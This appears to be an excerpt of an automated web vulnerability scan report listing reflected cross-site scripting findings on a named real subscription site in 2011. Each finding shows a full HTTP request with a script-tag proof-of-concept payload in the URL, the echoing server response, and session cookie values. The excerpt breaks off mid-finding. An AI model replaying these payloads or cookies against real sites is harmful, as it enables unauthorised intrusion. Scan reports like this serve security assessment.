1.209. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3ee7<script>alert(1)</script>3a4ccd97f47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php/f3ee7<script>alert(1)</script>3a4ccd97f47 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:31 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php/f3ee7<script>alert(1)</script>3a4ccd97f47 is not found !</p>
...[SNIP]...

1.210. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7d38<script>alert(1)</script>435d834ccc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolc7d38<script>alert(1)</script>435d834ccc5/Netsparker58012c2b005441ad8f20a8853507792a/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=7s592f92f1b32ghkncatjunma1; mb_sessid=982b156dae357a11a402039c76a90903
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:19 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolc7d38<script>alert(1)</script>435d834ccc5/Netsparker58012c2b005441ad8f20a8853507792a is not found !</p>
...[SNIP]...

1.211. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3dbd6<script>alert(1)</script>b142582d6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a3dbd6<script>alert(1)</script>b142582d6e/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=7s592f92f1b32ghkncatjunma1; mb_sessid=982b156dae357a11a402039c76a90903
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 815
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a3dbd6<script>alert(1)</script>b142582d6e is not found !</p>
...[SNIP]...

1.212. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload edb49<script>alert(1)</script>7c6a1db1dd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontroledb49<script>alert(1)</script>7c6a1db1dd9/Netsparker8fc0818469324be7a66e95df89352dfc/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:05 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontroledb49<script>alert(1)</script>7c6a1db1dd9/Netsparker8fc0818469324be7a66e95df89352dfc is not found !</p>
...[SNIP]...

1.213. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5b9da<script>alert(1)</script>ebdba01c549 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc5b9da<script>alert(1)</script>ebdba01c549/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:59 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 816
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc5b9da<script>alert(1)</script>ebdba01c549 is not found !</p>
...[SNIP]...

1.214. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4025e<script>alert(1)</script>69034f81869 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol4025e<script>alert(1)</script>69034f81869/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:16 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol4025e<script>alert(1)</script>69034f81869/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com is not found !</p>
...[SNIP]...

1.215. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6c90b<script>alert(1)</script>453c69189e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com6c90b<script>alert(1)</script>453c69189e3 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:25 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com6c90b<script>alert(1)</script>453c69189e3 is not found !</p>
...[SNIP]...

1.216. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38595<script>alert(1)</script>7b1ed9f4cc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol38595<script>alert(1)</script>7b1ed9f4cc0/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:29 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol38595<script>alert(1)</script>7b1ed9f4cc0/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php is not found !</p>
...[SNIP]...

1.217. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bddaf<script>alert(1)</script>be5163b752c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.phpbddaf<script>alert(1)</script>be5163b752c HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.phpbddaf<script>alert(1)</script>be5163b752c is not found !</p>
...[SNIP]...

1.218. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8ed49<script>alert(1)</script>7bfcd9f6168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php/8ed49<script>alert(1)</script>7bfcd9f6168 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:07 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php/8ed49<script>alert(1)</script>7bfcd9f6168 is not found !</p>
...[SNIP]...

1.219. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 290be<script>alert(1)</script>d6a55c0227b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol290be<script>alert(1)</script>d6a55c0227b/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:19 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol290be<script>alert(1)</script>d6a55c0227b/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1 is not found !</p>
...[SNIP]...

1.220. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23203<script>alert(1)</script>15e2e16f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a123203<script>alert(1)</script>15e2e16f6/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:34 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 814
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a123203<script>alert(1)</script>15e2e16f6 is not found !</p>
...[SNIP]...

1.221. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23019<script>alert(1)</script>5c03cda4908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol23019<script>alert(1)</script>5c03cda4908/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol23019<script>alert(1)</script>5c03cda4908/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php is not found !</p>
...[SNIP]...

1.222. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee8b8<script>alert(1)</script>15cf6cd2e68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.phpee8b8<script>alert(1)</script>15cf6cd2e68 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:38 GMT
